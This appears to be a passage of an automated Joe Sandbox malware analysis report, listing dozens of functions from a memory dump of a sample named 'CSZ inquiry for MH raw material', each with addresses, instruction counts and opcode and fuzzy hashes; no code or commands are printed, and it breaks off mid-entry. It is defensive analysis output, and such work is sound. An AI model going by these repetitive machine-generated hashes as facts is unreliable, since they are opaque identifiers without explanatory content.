                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d736dc88df1669ddbd710b480198acab5acec8db4237e3215d574a8d76db755
                                                • Instruction ID: e9498999ad73efc18d42dc877481cf9f6f4c226c64e38e259d478de5c7ce4629
                                                • Opcode Fuzzy Hash: 8d736dc88df1669ddbd710b480198acab5acec8db4237e3215d574a8d76db755
                                                • Instruction Fuzzy Hash: 1041EE32E00202DBD7269F98C880A6FBBB5FB94714F26812ED9259F395D775D842CB90
                                                Function 014F8918 Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 242110e23ad40a90f91e992be307da959b6a70bde29c0b23a8ae30de67eb726f
                                                • Instruction ID: 681b406afd831bc582967b644227a34dcfbe9b23e4b23849e6c1fc74281bf0c0
                                                • Opcode Fuzzy Hash: 242110e23ad40a90f91e992be307da959b6a70bde29c0b23a8ae30de67eb726f
                                                • Instruction Fuzzy Hash: 53414C725183179ED312DF65C840A6BB6E9BF84B54F40092FFA84DB260E730DE058BA3
                                                Function 014FA020 Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction ID: b4c6b9e879631861e08ef7cea4243f85024d6153951c9b5af8a3adac4ccacb39
                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction Fuzzy Hash: 38412871A00211EFDB11DE2994547BEBBB2FF90754F25806FAE598F350D6368D40CB91
                                                Function 015009AD Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fde71e31b0e4a90b595bdba8d5db6e9210392757a0b8ef7ab5a8677ee3880f7
                                                • Instruction ID: ec729e7bbaca8152cb3f77c1866d3e3409394c0d924fada67aa0626d1fea6082
                                                • Opcode Fuzzy Hash: 8fde71e31b0e4a90b595bdba8d5db6e9210392757a0b8ef7ab5a8677ee3880f7
                                                • Instruction Fuzzy Hash: F5417C71600602EFD722CF58C840B2ABBF5FF94354F248A6AE449CF291E770E942CB90
                                                Function 01530710 Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction ID: 75deedb5c38a6d0dc0c0eedbb1f0df2e56518a98d791b6ba23007ef7594eb467
                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction Fuzzy Hash: 5A412C75A00705EFDB25CF98C980AAABBF8FF98704B10496DE556DB691D330EA44CF90
                                                Function 0150262C Relevance: .1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e670dd828c136ccd68083a55bd250d47252d823cef32abaf822c5fbc81174675
                                                • Instruction ID: 9d47c69f1262fe24d0871cf14110b503244b52e1a8bf891b9762ee707ab0f3f5
                                                • Opcode Fuzzy Hash: e670dd828c136ccd68083a55bd250d47252d823cef32abaf822c5fbc81174675
                                                • Instruction Fuzzy Hash: A7418E71501702DFCB62EFA8C944A69B7F1FF95314F1085AEC9169F2E1DB30A941CB51
                                                Function 0153C8F9 Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 881b37862df3d0125159aad8c48fbcfef1f1c84e8ffb69efe81ceee6976b3bad
                                                • Instruction ID: 57328a62283364e42c7c678235437256a9dfdf71f3079edfecb809c8d4c83cfd
                                                • Opcode Fuzzy Hash: 881b37862df3d0125159aad8c48fbcfef1f1c84e8ffb69efe81ceee6976b3bad
                                                • Instruction Fuzzy Hash: A53179B2A00346DFDB12CFA8D440799BBF0FB89714F2185AED119EF251D372A902CB90
                                                Function 015807C3 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a9e31dacb61ad2c6c6362e6ab558b8d88139f861f12fc931a714f4fa934610e
                                                • Instruction ID: 03e2ad216b71efef22ff910bc99e5dd5e6c5fb6a741ff081709abcd32b7fc15b
                                                • Opcode Fuzzy Hash: 4a9e31dacb61ad2c6c6362e6ab558b8d88139f861f12fc931a714f4fa934610e
                                                • Instruction Fuzzy Hash: E34190715143019FD320EF29C845B9BBBE8FF88614F104A2EF598DB291D7709944CF92
                                                Function 015CEEDB Relevance: .1, Instructions: 113COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27c14830bd6be3908fa0d4cc63d819bc7182e33629a94cf0022ba532954cd5c2
                                                • Instruction ID: c12636d16d20b88c78a73f833de7bf2337df3f14c1c6e8db12dca4dfc5c9a0c0
                                                • Opcode Fuzzy Hash: 27c14830bd6be3908fa0d4cc63d819bc7182e33629a94cf0022ba532954cd5c2
                                                • Instruction Fuzzy Hash: C4419433A1402B9BCB28CFA8C49157AB7F1FB88704B5641BDD915EF285DB34A945C790
                                                Function 015CFA49 Relevance: .1, Instructions: 113COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f20a03325597b9b221cce9a65c0077cce8ad2daa3fcfe25ca13a88bfede46bbb
                                                • Instruction ID: 8dcb18c456663a7b885910282faee6afd704e22218ebd9fe0f934925ccb2ed9f
                                                • Opcode Fuzzy Hash: f20a03325597b9b221cce9a65c0077cce8ad2daa3fcfe25ca13a88bfede46bbb
                                                • Instruction Fuzzy Hash: EE31E2327001069FD718CEACCC44AA6BB97FF85B14F18852DE918CF285E7B4D945C394
                                                Function 014F80A0 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d52bea8f6c3ea873f699765f797d991dc8d71d786c7e3caa1f69e05262c03b8
                                                • Instruction ID: debab79ca5a9053fb15c1b15d3700215c181a30f0d6e1265a33cc57073facee8
                                                • Opcode Fuzzy Hash: 4d52bea8f6c3ea873f699765f797d991dc8d71d786c7e3caa1f69e05262c03b8
                                                • Instruction Fuzzy Hash: 8E41D271A056179FDB11DF58CA806ADB7B1BB54760F24832EDA15AF3A0DB30ED418B90
                                                Function 015805A7 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: efbbcfab89b08766547775898153ec5a8e42ab792069900fe3d7c7677570117c
                                                • Instruction ID: 635580cd7c945c1c811fea190b4aad266f84342091b34bcf2573c7f5b5ced0d3
                                                • Opcode Fuzzy Hash: efbbcfab89b08766547775898153ec5a8e42ab792069900fe3d7c7677570117c
                                                • Instruction Fuzzy Hash: 0B41C2726046529FD321EF69C840A7EB7E5FFC8704F140A19F994AB680E730E909C7A6
                                                Function 01504859 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be105b26e5542ea0c7ef566fcfd66f69ba9df570c323bd1a6f6d9d40ba2c7a76
                                                • Instruction ID: ebd5efe4d48cb20a19b5c66b2b2e89c04666f2f26963c0ef898604879ef6691d
                                                • Opcode Fuzzy Hash: be105b26e5542ea0c7ef566fcfd66f69ba9df570c323bd1a6f6d9d40ba2c7a76
                                                • Instruction Fuzzy Hash: 2B419E702003028BD726DF68D894B2ABBEABF80364F15487DEA558F2E1DB70D945CB91
                                                Function 014F8B50 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 890a63295e436a6f6a60140c390a1f8f5cd907406f1c52f7548aa00a73a9f401
                                                • Instruction ID: beb79c04f88593c966de7bb495818f0a43b2a623f84a85a28f604faf7b0a9006
                                                • Opcode Fuzzy Hash: 890a63295e436a6f6a60140c390a1f8f5cd907406f1c52f7548aa00a73a9f401
                                                • Instruction Fuzzy Hash: EF417F71A0164ACFCB15DF69C980A9DB7F2FF98320F14862FD666AB3A0D7349941CB40
                                                Function 015CFB76 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 143c2476f24601f98b8d91b9cd1723bfbfcf8a5e010c6a42ce74733122eef3b5
                                                • Instruction ID: fb1ac222a36b15e70f0db18363f8adc8dec813666cb9e21906383fff4b4e60be
                                                • Opcode Fuzzy Hash: 143c2476f24601f98b8d91b9cd1723bfbfcf8a5e010c6a42ce74733122eef3b5
                                                • Instruction Fuzzy Hash: 8031D431714106AFE7148FA9CC44A9BBBE6FF88B54F11842EF918CF245D634E941C790
                                                Function 015102E1 Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction ID: 32876351497178d2170b442c4f18413bba12546b1ea1b404830c0b23368f1e4a
                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction Fuzzy Hash: 35310431A04245AFEB139B68CC40BAFBBE8BF54350F0445A6F815DF39AD6749984CBA0
                                                Function 015AE3DB Relevance: .1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc2d144743245d21f15b5e6524a431dc41218521cb409a72b97e2de46f1eca5b
                                                • Instruction ID: 39e3aef89d5450f062939168eff199d5fe09a9fa6fd9b8234205b0d03df4d31a
                                                • Opcode Fuzzy Hash: cc2d144743245d21f15b5e6524a431dc41218521cb409a72b97e2de46f1eca5b
                                                • Instruction Fuzzy Hash: 7B319635790716ABE7229F658C41FAF7AB8FB99B50F400028F600AF2D1DAA5DC0187A0
                                                Function 015B4B4B Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0495c80fffb3a9b3b94a0e242a75aa1a1faa7d9f23b96c18e5133a7642dbfd3
                                                • Instruction ID: 1e5dc475c7c5c22add23563273de89031efdc7fbbf41084b621866857aafa887
                                                • Opcode Fuzzy Hash: d0495c80fffb3a9b3b94a0e242a75aa1a1faa7d9f23b96c18e5133a7642dbfd3
                                                • Instruction Fuzzy Hash: E331B0322052018FC731DF19D8C0EAAB7E6FB81760F1A446DE996CF256DB30E804DB91
                                                Function 01504260 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4ad58b3b4c62cf3966598d9ab4a3fc28d377d53012e8405dc26978a1872e31c
                                                • Instruction ID: 978b16b34ab6f7a5116224a82ef8a05ce165c05fb346d7a5baa1b40ff20763ad
                                                • Opcode Fuzzy Hash: b4ad58b3b4c62cf3966598d9ab4a3fc28d377d53012e8405dc26978a1872e31c
                                                • Instruction Fuzzy Hash: AE41BF71200B46DFD722DF68C880BDA7BE9BF45714F11882DEA9A8F290D770E844CB90
                                                Function 015B4BB0 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e9240fce5d886408914fedcea138403088f0aa6865e6e3e5a2e34be5930cc07
                                                • Instruction ID: 305916a2528347a8a5602a961b134a949e0620aec60b122ffee3403b38ab8d5e
                                                • Opcode Fuzzy Hash: 7e9240fce5d886408914fedcea138403088f0aa6865e6e3e5a2e34be5930cc07
                                                • Instruction Fuzzy Hash: B0317E716042018FD734DF28C8C1AAAB7E5FB84B10F16496DE9A6DF296E730E804DB91
                                                Function 0157EB1D Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90bbd678f75be8b75d087dca9256638b3a67a5dce339d9170394891f4946b8a4
                                                • Instruction ID: c419190730418f3b8c16a8a704b1a54dbf4b82a64ea6c09ce4a10ab379a9d465
                                                • Opcode Fuzzy Hash: 90bbd678f75be8b75d087dca9256638b3a67a5dce339d9170394891f4946b8a4
                                                • Instruction Fuzzy Hash: B231A1713017829BF326576DD95AB297FD9FB81B84F1D00E0AB499F6D1DB28D841C230
                                                Function 015C61C3 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a48461408a6f5a81f46f080deb8237ee19a7e669f91af01d6dcf91d07b340ad
                                                • Instruction ID: 580d017a841059c7b96a260e2f1202af1cdc2c25f16c6392e07ba8baa0b75403
                                                • Opcode Fuzzy Hash: 5a48461408a6f5a81f46f080deb8237ee19a7e669f91af01d6dcf91d07b340ad
                                                • Instruction Fuzzy Hash: 2631A176A00116AFDB15DF98C840BAEB7B6FB88B44F454169E901AF244D770ED01CBA4
                                                Function 015A483A Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed11684f2f0ea5c5ed6a6bcb3646bd0bc5e3b216716ea8038cc998451891fdba
                                                • Instruction ID: 8f8ba3566f8dabc80a2bb070a4f2b3f9ad701d29aeb57c2b7a16fb0d2b532ae8
                                                • Opcode Fuzzy Hash: ed11684f2f0ea5c5ed6a6bcb3646bd0bc5e3b216716ea8038cc998451891fdba
                                                • Instruction Fuzzy Hash: 50316576A4012DAFCF21DF94DC84BDEBBB5BB98310F1400A5A508AB250DB70DE91CF90
                                                Function 0152EB20 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54f60f2e19cb01844d798aca654413c91590e3ede22cb6d528ba644b6bf02ffe
                                                • Instruction ID: ed9864bd56b3535bc0566d98d8c6df53957ce9bb8c8d8acddc543696a0356364
                                                • Opcode Fuzzy Hash: 54f60f2e19cb01844d798aca654413c91590e3ede22cb6d528ba644b6bf02ffe
                                                • Instruction Fuzzy Hash: CC31D773E00625AFDB21DFA9C840A9EBBF8FF49350F014426E915EF290D2709E008BE0
                                                Function 015C6BD7 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8eb104e6550096174d0a2e2f6250d72d3aec9245f869d39710dc3041a4123b98
                                                • Instruction ID: 3a6e3b3e92756fd6595920c9653caf4dc3b8765f37b99a0d2abeca771170a094
                                                • Opcode Fuzzy Hash: 8eb104e6550096174d0a2e2f6250d72d3aec9245f869d39710dc3041a4123b98
                                                • Instruction Fuzzy Hash: 13316F316002049FCB24CF69D8C5A5B7BE4FF88750F45846DF918DF289D270EA49CBA4
                                                Function 015C60B8 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41fb751e13842641f100332420b74291a5cda45e0e8c0c27ed83aa0fc0f19faa
                                                • Instruction ID: 079f8d94eec4fc50e0fb1ef6479d51fc4913294201b6b34c73e683994b252254
                                                • Opcode Fuzzy Hash: 41fb751e13842641f100332420b74291a5cda45e0e8c0c27ed83aa0fc0f19faa
                                                • Instruction Fuzzy Hash: 1231C275A40606AFEB129FA9C850A6FB7F9BFC4B54F11006DE505EF342DA70DE018B90
                                                Function 015007AF Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4966245c68262ce4ad4532c6cde94aa568db1f36c8bbb18391081ea2be2463a
                                                • Instruction ID: 5f88b54fafdffa6a9c4c92dd39edef6e6cfb3196c7fed6cdd8d77b5d01fffa59
                                                • Opcode Fuzzy Hash: f4966245c68262ce4ad4532c6cde94aa568db1f36c8bbb18391081ea2be2463a
                                                • Instruction Fuzzy Hash: 2D318132A046129BC713DEA48890A6BBBA5BFD4690F01492DFD55AF2D0DB30DD1187E1
                                                Function 01508550 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a977f97f2d8a2af87c0ff8b4921f75c6e44e956e5e27000427150b5e11aba3e1
                                                • Instruction ID: 565d4aac9155d9a84f5f460048f52a849b7fbcedc8118ec05b78c3eb00bc7a49
                                                • Opcode Fuzzy Hash: a977f97f2d8a2af87c0ff8b4921f75c6e44e956e5e27000427150b5e11aba3e1
                                                • Instruction Fuzzy Hash: 3031AD71A093029FE721CF59C840B2BBBE9FB98710F0549AEE9849B391D771E844CB91
                                                Function 0153A6C7 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction ID: 57eea84ece61bccaedcf04162d187d2e2a0cc44cfcfb7dd48cfd7e1bf8d92ef3
                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction Fuzzy Hash: 163130B2B00B01AFE761CF6DDD81B57BBF8BB88650F04092DA59AC7651E730E900CB50
                                                Function 015AEBD0 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a57cb585f561d51313d3915fb54880f8a295be0734160842d313ca4e3ca5a36c
                                                • Instruction ID: 5d7498ec8039208ba013054bf13e897c5ab49d80222f836a92b4adcacbcc4043
                                                • Opcode Fuzzy Hash: a57cb585f561d51313d3915fb54880f8a295be0734160842d313ca4e3ca5a36c
                                                • Instruction Fuzzy Hash: 3831AAB1685302CFCB11DF19C59195EBBF1FF89218F8549AEE4889F251E330EA44CB92
                                                Function 0152438F Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef07fb50b9500880fe4dc64ca9fabbcf3b4e2f0f13907e989531f0be844c8146
                                                • Instruction ID: 96971ddf2cab163e1f1bf51824ac07cebcab096fb457af9ff5e966f311f83cb6
                                                • Opcode Fuzzy Hash: ef07fb50b9500880fe4dc64ca9fabbcf3b4e2f0f13907e989531f0be844c8146
                                                • Instruction Fuzzy Hash: B531C032B006169FD720EFA8C980A6EBBF9BF95304F008529D156DB694E770ED45CBA0
                                                Function 014FCB7E Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                • Instruction ID: 98e20bc01c954cd648a6c8570833a9a4c487e22a127c8f5c11c61e3f5f9432df
                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                • Instruction Fuzzy Hash: 7E210936E4025BAAD7119BB98851BAFBBB5BF55740F06813A9E15EB350E270C90087A0
                                                Function 014FC156 Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02415278e28e17b426a25e6d8372744753aa995d741d90e786672c00aeb9adaf
